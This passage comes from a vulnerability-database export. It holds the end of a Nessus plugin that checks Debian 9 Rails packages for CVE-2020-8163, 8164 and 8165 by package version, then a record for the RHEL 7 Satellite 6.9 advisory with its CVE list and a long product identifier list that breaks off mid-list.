the\napplication.\n\nCVE-2020-8163\n\nA code injection vulnerability in Rails would allow an attacker who\ncontrolled the `locals` argument of a `render` call to perform a RCE.\n\nCVE-2020-8164\n\nA deserialization of untrusted data vulnerability exists in rails\nwhich can allow an attacker to supply information can be inadvertently\nleaked from Strong Parameters.\n\nCVE-2020-8165\n\nA deserialization of untrusted data vulnernerability exists in rails\nthat can allow an attacker to unmarshal user-provided objects in\nMemCacheStore and RedisCacheStore potentially resulting in an RCE.\n\nFor Debian 9 stretch, these problems have been fixed in version\n2:4.2.7.1-1+deb9u3.\n\nWe recommend that you upgrade your rails packages.\n\nFor the detailed security status of rails please refer to its security\ntracker page at: https://security-tracker.debian.org/tracker/rails\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2020/07/msg00013.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/rails\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/rails\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:rails\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby-actionmailer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby-actionpack\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby-actionview\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby-activejob\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby-activemodel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby-activerecord\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby-activesupport\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby-rails\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby-railties\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"rails\", reference:\"2:4.2.7.1-1+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"ruby-actionmailer\", reference:\"2:4.2.7.1-1+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"ruby-actionpack\", reference:\"2:4.2.7.1-1+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"ruby-actionview\", reference:\"2:4.2.7.1-1+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"ruby-activejob\", reference:\"2:4.2.7.1-1+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"ruby-activemodel\", reference:\"2:4.2.7.1-1+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"ruby-activerecord\", reference:\"2:4.2.7.1-1+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"ruby-activesupport\", reference:\"2:4.2.7.1-1+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"ruby-rails\", reference:\"2:4.2.7.1-1+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"ruby-railties\", reference:\"2:4.2.7.1-1+deb9u3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:27:48", "description": "The remote Redhat Enterprise Linux 7 host has packages installed that are affected by multiple vulnerabilities as referenced in the RHSA-2021:1313 advisory.\n\n - rubygem-rest-client: session fixation vulnerability Set-Cookie headers present in an HTTP 30x redirection responses (CVE-2015-1820)\n\n - rubygem-rest-client: unsanitized application logging (CVE-2015-3448)\n\n - foreman: Managing repositories with their id via hammer does not respect the role filters (CVE-2017-2662)\n\n - rack-protection: Timing attack in authenticity_token.rb (CVE-2018-1000119)\n\n - rubygem-rack: hijack sessions by using timing attacks targeting the session id (CVE-2019-16782)\n\n - python-psutil: Double free because of refcount mishandling (CVE-2019-18874)\n\n - netty: compression/decompression codecs don't enforce limits on buffer allocation sizes (CVE-2020-11612)\n\n - foreman: world-readable OMAPI secret through the ISC DHCP server (CVE-2020-14335)\n\n - rubygem-activeview: Cross-site scripting in translation helpers (CVE-2020-15169)\n\n - resteasy-client: potential sensitive information leakage in JAX-RS RESTEasy Client's WebApplicationException handling (CVE-2020-25633)\n\n - rubygem-activestorage: circumvention of file size limits in ActiveStorage (CVE-2020-8162)\n\n - rubygem-actionpack: possible strong parameters bypass (CVE-2020-8164)\n\n - rubygem-activesupport: potentially unintended unmarshalling of user-provided objects in MemCacheStore and RedisCacheStore (CVE-2020-8165)\n\n - rubygem-actionpack: ability to forge per-form CSRF tokens given a global CSRF token (CVE-2020-8166)\n\n - rubygem-actionview: CSRF vulnerability in rails-ujs (CVE-2020-8167)\n\n - rubygem-rails: untrusted users able to run pending migrations in production (CVE-2020-8185)\n\n - django: potential SQL injection via tolerance parameter in GIS functions and aggregates on Oracle (CVE-2020-9402)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-04-21T00:00:00", "type": "nessus", "title": "RHEL 7 : Satellite 6.9 Release (Moderate) (RHSA-2021:1313)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1820", "CVE-2015-3448", "CVE-2017-2662", "CVE-2018-1000119", "CVE-2019-16782", "CVE-2019-18874", "CVE-2020-11612", "CVE-2020-14335", "CVE-2020-15169", "CVE-2020-25633", "CVE-2020-8162", "CVE-2020-8164", "CVE-2020-8165", "CVE-2020-8166", "CVE-2020-8167", "CVE-2020-8185", "CVE-2020-9402"], "modified": "2023-01-23T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:ansible-collection-redhat-satellite", "p-cpe:/a:redhat:enterprise_linux:ansible-runner", "p-cpe:/a:redhat:enterprise_linux:ansiblerole-foreman_scap_client", "p-cpe:/a:redhat:enterprise_linux:ansiblerole-insights-client", "p-cpe:/a:redhat:enterprise_linux:ansiblerole-satellite-receptor-installer", "p-cpe:/a:redhat:enterprise_linux:candlepin", "p-cpe:/a:redhat:enterprise_linux:candlepin-selinux", "p-cpe:/a:redhat:enterprise_linux:crane-selinux", "p-cpe:/a:redhat:enterprise_linux:createrepo_c", "p-cpe:/a:redhat:enterprise_linux:createrepo_c-libs", "p-cpe:/a:redhat:enterprise_linux:foreman", "p-cpe:/a:redhat:enterprise_linux:foreman-bootloaders-redhat", "p-cpe:/a:redhat:enterprise_linux:foreman-bootloaders-redhat-tftpboot", "p-cpe:/a:redhat:enterprise_linux:foreman-cli", "p-cpe:/a:redhat:enterprise_linux:foreman-debug", "p-cpe:/a:redhat:enterprise_linux:foreman-discovery-image", "p-cpe:/a:redhat:enterprise_linux:foreman-discovery-image-service", "p-cpe:/a:redhat:enterprise_linux:foreman-discovery-image-service-tui", "p-cpe:/a:redhat:enterprise_linux:foreman-dynflow-sidekiq", "p-cpe:/a:redhat:enterprise_linux:foreman-ec2", "p-cpe:/a:redhat:enterprise_linux:foreman-gce", "p-cpe:/a:redhat:enterprise_linux:foreman-installer", "p-cpe:/a:redhat:enterprise_linux:foreman-installer-katello", "p-cpe:/a:redhat:enterprise_linux:foreman-journald", "p-cpe:/a:redhat:enterprise_linux:foreman-libvirt", "p-cpe:/a:redhat:enterprise_linux:foreman-openstack", "p-cpe:/a:redhat:enterprise_linux:foreman-ovirt", "p-cpe:/a:redhat:enterprise_linux:foreman-postgresql", "p-cpe:/a:redhat:enterprise_linux:foreman-proxy", "p-cpe:/a:redhat:enterprise_linux:foreman-proxy-content", "p-cpe:/a:redhat:enterprise_linux:foreman-proxy-journald", "p-cpe:/a:redhat:enterprise_linux:foreman-telemetry", "p-cpe:/a:redhat:enterprise_linux:foreman-vmware", "p-cpe:/a:redhat:enterprise_linux:foreman-proxy-selinux", "p-cpe:/a:redhat:enterprise_linux:hfsplus-tools", "p-cpe:/a:redhat:enterprise_linux:foreman-selinux", "p-cpe:/a:redhat:enterprise_linux:katello", "p-cpe:/a:redhat:enterprise_linux:foreman-service", "p-cpe:/a:redhat:enterprise_linux:katello-common", "p-cpe:/a:redhat:enterprise_linux:katello-debug", "p-cpe:/a:redhat:enterprise_linux:katello-certs-tools", "p-cpe:/a:redhat:enterprise_linux:katello-client-bootstrap", "p-cpe:/a:redhat:enterprise_linux:katello-selinux", "p-cpe:/a:redhat:enterprise_linux:python-simplejson", "p-cpe:/a:redhat:enterprise_linux:keycloak-httpd-client-install", "p-cpe:/a:redhat:enterprise_linux:kobo", "p-cpe:/a:redhat:enterprise_linux:python-zope-interface", "p-cpe:/a:redhat:enterprise_linux:libcomps", "p-cpe:/a:redhat:enterprise_linux:python2-amqp", "p-cpe:/a:redhat:enterprise_linux:libmodulemd", "p-cpe:/a:redhat:enterprise_linux:python2-ansible-runner", "p-cpe:/a:redhat:enterprise_linux:libmodulemd2", "p-cpe:/a:redhat:enterprise_linux:libsolv", "p-cpe:/a:redhat:enterprise_linux:libwebsockets", "p-cpe:/a:redhat:enterprise_linux:python2-anyjson", "p-cpe:/a:redhat:enterprise_linux:livecd-tools", "p-cpe:/a:redhat:enterprise_linux:python2-billiard", "p-cpe:/a:redhat:enterprise_linux:mod_passenger", "p-cpe:/a:redhat:enterprise_linux:python2-celery", "p-cpe:/a:redhat:enterprise_linux:mod_xsendfile", "p-cpe:/a:redhat:enterprise_linux:python2-click", "p-cpe:/a:redhat:enterprise_linux:ostree", "p-cpe:/a:redhat:enterprise_linux:python2-crane", "p-cpe:/a:redhat:enterprise_linux:pcp-mmvstatsd", "p-cpe:/a:redhat:enterprise_linux:python2-daemon", "p-cpe:/a:redhat:enterprise_linux:pulp-admin-client", "p-cpe:/a:redhat:enterprise_linux:pulp-docker-admin-extensions", "p-cpe:/a:redhat:enterprise_linux:pulp-docker-plugins", "p-cpe:/a:redhat:enterprise_linux:python2-django", "p-cpe:/a:redhat:enterprise_linux:pulp-katello", "p-cpe:/a:redhat:enterprise_linux:pulp-maintenance", "p-cpe:/a:redhat:enterprise_linux:python2-flask", "p-cpe:/a:redhat:enterprise_linux:pulp-nodes-child", "p-cpe:/a:redhat:enterprise_linux:python2-future", "p-cpe:/a:redhat:enterprise_linux:pulp-nodes-common", "p-cpe:/a:redhat:enterprise_linux:python2-gobject", "p-cpe:/a:redhat:enterprise_linux:pulp-nodes-parent", "p-cpe:/a:redhat:enterprise_linux:pulp-ostree-admin-extensions", "p-cpe:/a:redhat:enterprise_linux:python2-gobject-base", "p-cpe:/a:redhat:enterprise_linux:pulp-ostree-plugins", "p-cpe:/a:redhat:enterprise_linux:pulp-puppet-admin-extensions", "p-cpe:/a:redhat:enterprise_linux:python2-isodate", "p-cpe:/a:redhat:enterprise_linux:pulp-puppet-plugins", "p-cpe:/a:redhat:enterprise_linux:python2-itsdangerous", "p-cpe:/a:redhat:enterprise_linux:pulp-puppet-tools", "p-cpe:/a:redhat:enterprise_linux:pulp-rpm-admin-extensions", "p-cpe:/a:redhat:enterprise_linux:python2-jinja2", "p-cpe:/a:redhat:enterprise_linux:pulp-rpm-plugins", "p-cpe:/a:redhat:enterprise_linux:python2-jmespath", "p-cpe:/a:redhat:enterprise_linux:pulp-selinux", "p-cpe:/a:redhat:enterprise_linux:pulp-server", "p-cpe:/a:redhat:enterprise_linux:python2-keycloak-httpd-client-install", "p-cpe:/a:redhat:enterprise_linux:pulpcore-selinux", "p-cpe:/a:redhat:enterprise_linux:puppet-agent", "p-cpe:/a:redhat:enterprise_linux:puppet-agent-oauth", "p-cpe:/a:redhat:enterprise_linux:python2-kombu", "p-cpe:/a:redhat:enterprise_linux:puppet-foreman_scap_client", "p-cpe:/a:redhat:enterprise_linux:python2-lockfile", "p-cpe:/a:redhat:enterprise_linux:puppetlabs-stdlib", "p-cpe:/a:redhat:enterprise_linux:python2-markupsafe", "p-cpe:/a:redhat:enterprise_linux:puppetserver", "p-cpe:/a:redhat:enterprise_linux:python2-okaara", "p-cpe:/a:redhat:enterprise_linux:pycairo", "p-cpe:/a:redhat:enterprise_linux:python-blinker", "p-cpe:/a:redhat:enterprise_linux:python2-pexpect", "p-cpe:/a:redhat:enterprise_linux:python-bson", "p-cpe:/a:redhat:enterprise_linux:python2-psutil", "p-cpe:/a:redhat:enterprise_linux:python-gnupg", "p-cpe:/a:redhat:enterprise_linux:python-gofer", "p-cpe:/a:redhat:enterprise_linux:python2-ptyprocess", "p-cpe:/a:redhat:enterprise_linux:python-gofer-qpid", "p-cpe:/a:redhat:enterprise_linux:python2-pycurl", "p-cpe:/a:redhat:enterprise_linux:python-imgcreate", "p-cpe:/a:redhat:enterprise_linux:python-kid", "p-cpe:/a:redhat:enterprise_linux:python2-solv", "p-cpe:/a:redhat:enterprise_linux:python-mongoengine", "p-cpe:/a:redhat:enterprise_linux:python2-twisted", "p-cpe:/a:redhat:enterprise_linux:python-nectar", "p-cpe:/a:redhat:enterprise_linux:python-oauth2", "p-cpe:/a:redhat:enterprise_linux:python2-vine", "p-cpe:/a:redhat:enterprise_linux:python-pulp-agent-lib", "p-cpe:/a:redhat:enterprise_linux:python2-werkzeug", "p-cpe:/a:redhat:enterprise_linux:python3-aiodns", "p-cpe:/a:redhat:enterprise_linux:python3-aiofiles", "p-cpe:/a:redhat:enterprise_linux:python3-aiohttp", "p-cpe:/a:redhat:enterprise_linux:python3-async-timeout", "p-cpe:/a:redhat:enterprise_linux:python3-attrs", "p-cpe:/a:redhat:enterprise_linux:python3-backoff", "p-cpe:/a:redhat:enterprise_linux:python3-cairo", "p-cpe:/a:redhat:enterprise_linux:python3-certifi", "p-cpe:/a:redhat:enterprise_linux:python3-cffi", "p-cpe:/a:redhat:enterprise_linux:python3-chardet", "p-cpe:/a:redhat:enterprise_linux:python3-click", "p-cpe:/a:redhat:enterprise_linux:python3-createrepo_c", "p-cpe:/a:redhat:enterprise_linux:python3-cryptography", "p-cpe:/a:redhat:enterprise_linux:python3-dateutil", "p-cpe:/a:redhat:enterprise_linux:python3-defusedxml", "p-cpe:/a:redhat:enterprise_linux:python3-diff-match-patch", "p-cpe:/a:redhat:enterprise_linux:python3-django", "p-cpe:/a:redhat:enterprise_linux:python3-django-currentuser", "p-cpe:/a:redhat:enterprise_linux:python3-django-filter", "p-cpe:/a:redhat:enterprise_linux:python-pulp-bindings", "p-cpe:/a:redhat:enterprise_linux:python-pulp-client-lib", "p-cpe:/a:redhat:enterprise_linux:python-pulp-common", "p-cpe:/a:redhat:enterprise_linux:python-pulp-docker-common", "p-cpe:/a:redhat:enterprise_linux:python-pulp-integrity", "p-cpe:/a:redhat:enterprise_linux:python-pulp-oid_validation", "p-cpe:/a:redhat:enterprise_linux:python-pulp-ostree-common", "p-cpe:/a:redhat:enterprise_linux:python-pulp-puppet-common", "p-cpe:/a:redhat:enterprise_linux:python-pulp-repoauth", "p-cpe:/a:redhat:enterprise_linux:python-pulp-rpm-common", "p-cpe:/a:redhat:enterprise_linux:python-pulp-streamer", "p-cpe:/a:redhat:enterprise_linux:python-pymongo", "p-cpe:/a:redhat:enterprise_linux:python-pymongo-gridfs", "p-cpe:/a:redhat:enterprise_linux:python-qpid", "p-cpe:/a:redhat:enterprise_linux:python-qpid-proton", "p-cpe:/a:redhat:enterprise_linux:python-qpid-qmf", "p-cpe:/a:redhat:enterprise_linux:python-saslwrapper", "p-cpe:/a:redhat:enterprise_linux:python-semantic_version", "p-cpe:/a:redhat:enterprise_linux:python3-jsonschema", "p-cpe:/a:redhat:enterprise_linux:python3-libcomps", "p-cpe:/a:redhat:enterprise_linux:python3-django-guardian", "p-cpe:/a:redhat:enterprise_linux:python3-django-import-export", "p-cpe:/a:redhat:enterprise_linux:python3-django-lifecycle", "p-cpe:/a:redhat:enterprise_linux:python3-django-prometheus", "p-cpe:/a:redhat:enterprise_linux:python3-django-readonly-field", "p-cpe:/a:redhat:enterprise_linux:python3-djangorestframework", "p-cpe:/a:redhat:enterprise_linux:python3-djangorestframework-queryfields", "p-cpe:/a:redhat:enterprise_linux:python3-drf-access-policy", "p-cpe:/a:redhat:enterprise_linux:python3-drf-nested-routers", "p-cpe:/a:redhat:enterprise_linux:python3-drf-spectacular", "p-cpe:/a:redhat:enterprise_linux:python3-dynaconf", "p-cpe:/a:redhat:enterprise_linux:python3-ecdsa", "p-cpe:/a:redhat:enterprise_linux:python3-et-xmlfile", "p-cpe:/a:redhat:enterprise_linux:python3-future", "p-cpe:/a:redhat:enterprise_linux:python3-gnupg", "p-cpe:/a:redhat:enterprise_linux:python3-gobject", "p-cpe:/a:redhat:enterprise_linux:python3-markuppy", "p-cpe:/a:redhat:enterprise_linux:python3-gobject-base", "p-cpe:/a:redhat:enterprise_linux:python3-markupsafe", "p-cpe:/a:redhat:enterprise_linux:python3-gunicorn", "p-cpe:/a:redhat:enterprise_linux:python3-mongoengine", "p-cpe:/a:redhat:enterprise_linux:python3-idna", "p-cpe:/a:redhat:enterprise_linux:python3-multidict", "p-cpe:/a:redhat:enterprise_linux:python3-idna-ssl", "p-cpe:/a:redhat:enterprise_linux:python3-odfpy", "p-cpe:/a:redhat:enterprise_linux:python3-importlib-metadata", "p-cpe:/a:redhat:enterprise_linux:python3-openpyxl", "p-cpe:/a:redhat:enterprise_linux:python3-inflection", "p-cpe:/a:redhat:enterprise_linux:python3-productmd", "p-cpe:/a:redhat:enterprise_linux:python3-iniparse", "p-cpe:/a:redhat:enterprise_linux:python3-prometheus-client", "p-cpe:/a:redhat:enterprise_linux:python3-jdcal", "p-cpe:/a:redhat:enterprise_linux:python3-psycopg2", "p-cpe:/a:redhat:enterprise_linux:python3-pulp-2to3-migration", "p-cpe:/a:redhat:enterprise_linux:python3-jinja2", "p-cpe:/a:redhat:enterprise_linux:python3-pulp-certguard", "p-cpe:/a:redhat:enterprise_linux:python3-pulp-container", "p-cpe:/a:redhat:enterprise_linux:python3-pulp-file", "p-cpe:/a:redhat:enterprise_linux:python3-pulp-rpm", "p-cpe:/a:redhat:enterprise_linux:python3-pulpcore", "p-cpe:/a:redhat:enterprise_linux:python3-tablib", "p-cpe:/a:redhat:enterprise_linux:python3-pyopenssl", "p-cpe:/a:redhat:enterprise_linux:python3-pycares", "p-cpe:/a:redhat:enterprise_linux:python3-pycparser", "p-cpe:/a:redhat:enterprise_linux:python3-typing", "p-cpe:/a:redhat:enterprise_linux:python3-typing-extensions", "p-cpe:/a:redhat:enterprise_linux:python3-pycryptodomex", "p-cpe:/a:redhat:enterprise_linux:python3-uritemplate", "p-cpe:/a:redhat:enterprise_linux:python3-pygtrie", "p-cpe:/a:redhat:enterprise_linux:python3-url-normalize", "p-cpe:/a:redhat:enterprise_linux:python3-pyjwkest", "p-cpe:/a:redhat:enterprise_linux:python3-urllib3", "p-cpe:/a:redhat:enterprise_linux:python3-pyjwt", "p-cpe:/a:redhat:enterprise_linux:python3-pymongo", "p-cpe:/a:redhat:enterprise_linux:python3-urlman", "p-cpe:/a:redhat:enterprise_linux:python3-pyrsistent", "p-cpe:/a:redhat:enterprise_linux:python3-pytz", "p-cpe:/a:redhat:enterprise_linux:python3-whitenoise", "p-cpe:/a:redhat:enterprise_linux:python3-pyyaml", "p-cpe:/a:redhat:enterprise_linux:python3-xlrd", "p-cpe:/a:redhat:enterprise_linux:python3-receptor-satellite", "p-cpe:/a:redhat:enterprise_linux:python3-xlwt", "p-cpe:/a:redhat:enterprise_linux:python3-redis", "p-cpe:/a:redhat:enterprise_linux:python3-yarl", "p-cpe:/a:redhat:enterprise_linux:python3-requests", "p-cpe:/a:redhat:enterprise_linux:python3-zipp", "p-cpe:/a:redhat:enterprise_linux:qpid-cpp-client", "p-cpe:/a:redhat:enterprise_linux:qpid-cpp-client-devel", "p-cpe:/a:redhat:enterprise_linux:python3-rpm", "p-cpe:/a:redhat:enterprise_linux:python3-rq", "p-cpe:/a:redhat:enterprise_linux:qpid-cpp-server", "p-cpe:/a:redhat:enterprise_linux:python3-semantic-version", "p-cpe:/a:redhat:enterprise_linux:python3-six", "p-cpe:/a:redhat:enterprise_linux:qpid-cpp-server-linearstore", "p-cpe:/a:redhat:enterprise_linux:python3-solv", "p-cpe:/a:redhat:enterprise_linux:qpid-dispatch-router", "p-cpe:/a:redhat:enterprise_linux:python3-sqlparse", "p-cpe:/a:redhat:enterprise_linux:python3-subscription-manager-rhsm", "p-cpe:/a:redhat:enterprise_linux:qpid-dispatch-tools", "p-cpe:/a:redhat:enterprise_linux:receptor", "p-cpe:/a:redhat:enterprise_linux:qpid-proton-c", "p-cpe:/a:redhat:enterprise_linux:redhat-access-insights-puppet", "p-cpe:/a:redhat:enterprise_linux:qpid-qmf", "p-cpe:/a:redhat:enterprise_linux:repoview", "p-cpe:/a:redhat:enterprise_linux:qpid-tools", "p-cpe:/a:redhat:enterprise_linux:rh-postgresql12-postgresql-evr", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-apipie-dsl", "p-cpe:/a:redhat:enterprise_linux:rhel8-kickstart-setup", "p-cpe:/a:redhat:enterprise_linux:rubygem-facter", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-apipie-params", "p-cpe:/a:redhat:enterprise_linux:rubygem-fast_gettext", "p-cpe:/a:redhat:enterprise_linux:rubygem-foreman_scap_client", "p-cpe:/a:redhat:enterprise_linux:rubygem-highline", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-apipie-rails", "p-cpe:/a:redhat:enterprise_linux:rubygem-oauth", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-audited", "p-cpe:/a:redhat:enterprise_linux:rubygem-passenger", "p-cpe:/a:redhat:enterprise_linux:rubygem-passenger-native", "p-cpe:/a:redhat:enterprise_linux:rubygem-passenger-native-libs", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-azure_mgmt_compute", "p-cpe:/a:redhat:enterprise_linux:rubygem-rack", "p-cpe:/a:redhat:enterprise_linux:rubygem-rake", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-azure_mgmt_network", "p-cpe:/a:redhat:enterprise_linux:saslwrapper", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-azure_mgmt_resources", "p-cpe:/a:redhat:enterprise_linux:satellite", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-azure_mgmt_storage", "p-cpe:/a:redhat:enterprise_linux:satellite-capsule", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-azure_mgmt_subscriptions", "p-cpe:/a:redhat:enterprise_linux:satellite-cli", "p-cpe:/a:redhat:enterprise_linux:satellite-common", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-bcrypt", "p-cpe:/a:redhat:enterprise_linux:satellite-debug-tools", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-builder", "p-cpe:/a:redhat:enterprise_linux:satellite-installer", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-bundler_ext", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-actioncable", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-actionmailbox", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-clamp", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-actionmailer", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-actionpack", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-coffee-rails", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-actiontext", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-actionview", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-activejob", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-activemodel", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-coffee-script", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-activerecord", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-coffee-script-source", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-activerecord-import", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-activerecord-session_store", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-concurrent-ruby", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-activestorage", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-concurrent-ruby-edge", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-activesupport", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-connection_pool", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-addressable", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-algebrick", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-crass", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-amazing_print", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-css_parser", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-ancestry", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-daemons", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-anemone", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-deacon", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-angular-rails-templates", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-ansi", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-declarative", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-apipie-bindings", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-declarative-option", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-ffi", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-fog-aws", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-fog-core", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-deep_cloneable", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-fog-google", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-fog-json", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-deface", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-fog-kubevirt", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-diffy", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-fog-libvirt", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-fog-openstack", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-domain_name", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-dynflow", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-erubi", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-excon", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-execjs", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-facter", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-faraday", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-faraday-cookie_jar", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-fog-ovirt", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-fog-vsphere", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-faraday_middleware", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-fog-xml", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-foreman-tasks", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-fast_gettext", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-foreman-tasks-core", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-graphql", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-foreman_ansible", 